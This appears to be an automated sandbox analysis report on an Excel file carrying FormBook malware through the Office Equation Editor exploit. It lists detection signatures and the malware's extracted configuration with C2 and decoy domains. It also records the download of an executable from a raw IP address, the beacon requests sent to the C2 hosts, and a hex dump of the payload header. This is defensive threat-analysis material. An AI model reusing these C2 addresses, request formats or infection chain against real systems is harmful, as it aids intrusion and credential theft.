Windows Analysis Report oustanding 03082921.xlsx

Overview

General Information

Sample Name: oustanding 03082921.xlsx
Analysis ID: 458692
MD5: 643fc978b1f9e32668a88202a7091266
SHA1: ee970a6713bd017fd118a1eb54a237339c4fd579
SHA256: e3469b3d96e6316114395abe8caef91aa9ac9edac2d701c2d64981d3c0dfc5f0
Tags: FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
Multi AV Scanner detection for domain / URL
Source: adultpeace.com Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for submitted file
Source: oustanding 03082921.xlsx ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: netsh.pdb source: vbc.exe, 00000007.00000002.2198845306.00000000004E9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 6_2_00409A40
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 6_2_00409A50
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 6_2_00409B42
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 6_2_00409B50
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 7_2_00416282
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 7_2_00406A94
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 9_2_00206282
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop ebx 9_2_001F6A95
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.cleanxcare.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.229.216.142:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.229.216.142:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 69MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.adultpeace.com/p2io/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Aug 2021 14:50:43 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Tue, 03 Aug 2021 14:09:54 GMTETag: "146600-5c8a83d6b91fb"Accept-Ranges: bytesContent-Length: 1336832Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d4 4c 09 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 70 10 00 00 f4 03 00 00 00 00 00 ca 8f 10 00 00 20 00 00 00 a0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 14 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 8f 10 00 4f 00 00 00 00 a0 10 00 a0 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 14 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 6f 10 00 00 20 00 00 00 70 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 f0 03 00 00 a0 10 00 00 f2 03 00 00 72 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 14 00 00 02 00 00 00 64 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 8f 10 00 00 00 00 00 48 00 00 00 02 00 05 00 4c a3 04 00 64 38 04 00 03 00 00 00 4d 08 00 06 b0 db 08 00 c8 b3 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1Host: www.iotcloud.technologyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1Host: www.micheldrake.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.25 192.0.78.25
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /www/dun.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.229.216.142Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7AE3BD.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /www/dun.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.229.216.142Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1Host: www.iotcloud.technologyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1Host: www.micheldrake.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.cleanxcare.com
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2171247047.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2166928921.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2178764759.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2167152019.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 7_2_004181B0 NtCreateFile, 7_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418260 NtReadFile, 7_2_00418260
Source: C:\Users\Public\vbc.exe Code function: 7_2_004182E0 NtClose, 7_2_004182E0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418390 NtAllocateVirtualMemory, 7_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 7_2_004182AC NtReadFile, 7_2_004182AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041838B NtAllocateVirtualMemory, 7_2_0041838B
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C00C4 NtCreateFile,LdrInitializeThunk, 7_2_008C00C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_008C0048
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C0078 NtResumeThread,LdrInitializeThunk, 7_2_008C0078
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C07AC NtCreateMutant,LdrInitializeThunk, 7_2_008C07AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BF9F0 NtClose,LdrInitializeThunk, 7_2_008BF9F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BF900 NtReadFile,LdrInitializeThunk, 7_2_008BF900
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_008BFAD0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_008BFAE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_008BFBB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_008BFB68
